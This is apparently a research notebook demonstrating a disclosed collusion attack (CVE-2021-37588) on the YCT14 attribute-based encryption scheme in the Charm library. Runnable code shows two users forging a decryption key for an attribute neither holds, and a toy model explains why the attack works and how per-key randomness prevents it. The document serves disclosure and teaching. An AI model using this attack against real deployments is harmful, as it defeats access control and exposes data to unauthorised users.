# Attacking YCT14

Attack on the scheme of Yao et al. 2014 (YCT14),
presented in "Enhancement of a lightweight
attribute-based encryption scheme for the internet of things". The attack is based on the collaboration of two
users of the system.
It is performed as described in CVE-2021-37588.

![title](img/yct14_main.png)


## Setup

```python
from charm.schemes.abenc.abenc_yct14 import EKPabe
from charm.toolbox.pairinggroup import PairingGroup, ZR, G1, G2, GT, pair
from charm.toolbox.secretutil import SecretUtil
from charm.toolbox.symcrypto import SymmetricCryptoAbstraction
from charm.toolbox.ABEnc import ABEnc
from charm.schemes.abenc.abenc_lsw08 import KPabe
from charm.core.math.pairing import hashPair as extractor

from abeattacks import attack_yct14
```


## Example of standard use

We generate a universe of attributes based on an example IoT scenario with the values TRANSPORT, MEDICAL and ENERGY.
We prepare a ciphertext with the policy TRANSPORT or MEDICAL and decrypt it.

```python
group = PairingGroup('MNT224')
kpabe = EKPabe(group)
attributes = ['TRANSPORT', 'MEDICAL', 'ENERGY']

# setup
(master_public_key, master_key) = kpabe.setup(attributes)

# keygen
policy = '(TRANSPORT or MEDICAL)'
secret_key = kpabe.keygen(master_public_key, master_key, policy)

# encrypt
msg = b"Consumption:3532;Temperature:23;Distance:1"
cipher_text = kpabe.encrypt(master_public_key, msg, attributes)

# decrypt
decrypted_msg = kpabe.decrypt(cipher_text, secret_key)

print("Correctness of standard use:", decrypted_msg == msg)
```

# Presentation of the attack

Two users collaborate to decrypt a message encrypted with attribute x = TRANSPORT, which neither of them holds. One user has attribute y = MEDICAL and the other has attribute z = ENERGY.


```python
group = PairingGroup('MNT224')
kpabe = EKPabe(group)
attributes = ['TRANSPORT', 'MEDICAL', 'ENERGY']

(master_public_key, master_key) = kpabe.setup(attributes)

policy_y = '(MEDICAL)'
policy_z = '(ENERGY)'

# generation of decryption keys
sk_y = kpabe.keygen(master_public_key, master_key, policy_y)
sk_z = kpabe.keygen(master_public_key, master_key, policy_z)

# generation of target ciphertext and decryption key for user x
policy_x = '(TRANSPORT)'
sk_x = kpabe.keygen(master_public_key, master_key, policy_x)
attr_target_ct = ['TRANSPORT']
msg = b"Distance:353;Model:ACG-E3"
target_ct = kpabe.encrypt(master_public_key, msg, attr_target_ct)
```


## Attack parameters

```python
# attack parameters (public)
PK = master_public_key
p_x = kpabe.attribute['TRANSPORT']
p_y = kpabe.attribute['MEDICAL']
p_z = kpabe.attribute['ENERGY']
```


## Phase 1

x = TRANSPORT, y = MEDICAL, z = ENERGY

Users y and z collaborate to attack x. They ask for decryption keys
based on the following policies:

- a1 = y or z
- a2 = x and y
- a3 = z or (x and y)

NOTE: They can do this because they have at least one of the attributes
in the policy.

```python
a_1 = '(MEDICAL or ENERGY)'
# a_2 = x and y, matching the policy list above
a_2 = '(TRANSPORT and MEDICAL)'
a_3 = 'ENERGY or (TRANSPORT and MEDICAL)'

# one decryption key per requested policy
d_a_1 = kpabe.keygen(master_public_key, master_key, a_1)
d_a_2 = kpabe.keygen(master_public_key, master_key, a_2)
d_a_3 = kpabe.keygen(master_public_key, master_key, a_3)
```



## Phase 2

```python
d_y = d_a_1['Du']['MEDICAL']
d_z = d_a_1['Du']['ENERGY']
d_u_x = d_a_2['Du']['TRANSPORT']
d_u_y = d_a_2['Du']['MEDICAL']
d_u_x_prima = d_a_3['Du']['TRANSPORT']
d_u_y_prima = d_a_3['Du']['MEDICAL']

# We perform the attack
d_plus = attack_yct14.yct14_collude_function(d_y, d_z, d_u_x, d_u_y, d_u_x_prima, d_u_y_prima)

# We generate a powerful key
new_x = {'policy': '(TRANSPORT)', 'Du': {'TRANSPORT': d_plus}}
try_decrypt = kpabe.decrypt(target_ct, new_x)
assert try_decrypt == msg
print("DECRYPTION ATTACK SUCCESSFUL")
```
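
Why the six components from Phase 1 are enough, shown as an added toy model over integers modulo a prime; this is not the notebook's code and not the `abeattacks` implementation. It assumes every key component has the form share / attribute secret with no per-key randomiser, and that an AND gate hands out 2-of-2 Shamir shares at points 1 and 2; all function names and values here are hypothetical.

```python
import secrets

P = 2**127 - 1  # toy prime modulus standing in for the group order (assumption)

def inv(a):
    """Modular inverse in Z_P (raises ValueError for 0)."""
    return pow(a % P, -1, P)

def rand():
    """Uniform non-zero element of Z_P."""
    return secrets.randbelow(P - 1) + 1

def keygen(s, sx, sy, sz, r, r_prime):
    """Toy key components for a1 = y or z, a2 = x and y, a3 = z or (x and y).

    s is the master secret, sx/sy/sz the attribute secrets, r and r_prime the
    fresh slopes of the two AND-gate polynomials q(t) = s + r*t.
    An OR gate passes the secret s down unchanged.
    """
    return {
        "d_y": s * inv(sy) % P,                       # a1: s / s_y
        "d_z": s * inv(sz) % P,                       # a1: s / s_z
        "d_u_x": (s + r) * inv(sx) % P,               # a2: q(1) / s_x
        "d_u_y": (s + 2 * r) * inv(sy) % P,           # a2: q(2) / s_y
        "d_u_x_prima": (s + r_prime) * inv(sx) % P,   # a3: q'(1) / s_x
        "d_u_y_prima": (s + 2 * r_prime) * inv(sy) % P,  # a3: q'(2) / s_y
    }

def combine(k):
    """Derive s / s_x from the issued components with linear algebra only.

    Nothing ties a component to the key it was issued in, so values from
    a1, a2 and a3 can be mixed freely. d_z is not needed in this toy model.
    """
    # d_u_y - d_y = 2r/s_y and d_u_y' - d_y = 2r'/s_y, so the ratio is r/r'
    rho = (k["d_u_y"] - k["d_y"]) * inv(k["d_u_y_prima"] - k["d_y"]) % P
    # d_u_x - rho*d_u_x' = (s/s_x)*(1 - rho), because r - rho*r' = 0
    return (k["d_u_x"] - rho * k["d_u_x_prima"]) * inv(1 - rho) % P

def demo():
    """Random instance: does the combination equal the never-issued s / s_x?"""
    s, sx, sy, sz = rand(), rand(), rand(), rand()
    k = keygen(s, sx, sy, sz, rand(), rand())
    return combine(k) == s * inv(sx) % P
```

The combination works because each component is a deterministic function of a share and a global attribute secret; a collusion-resistant design binds all components of one key to randomness unique to that key, so that values from different keys cannot be combined.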
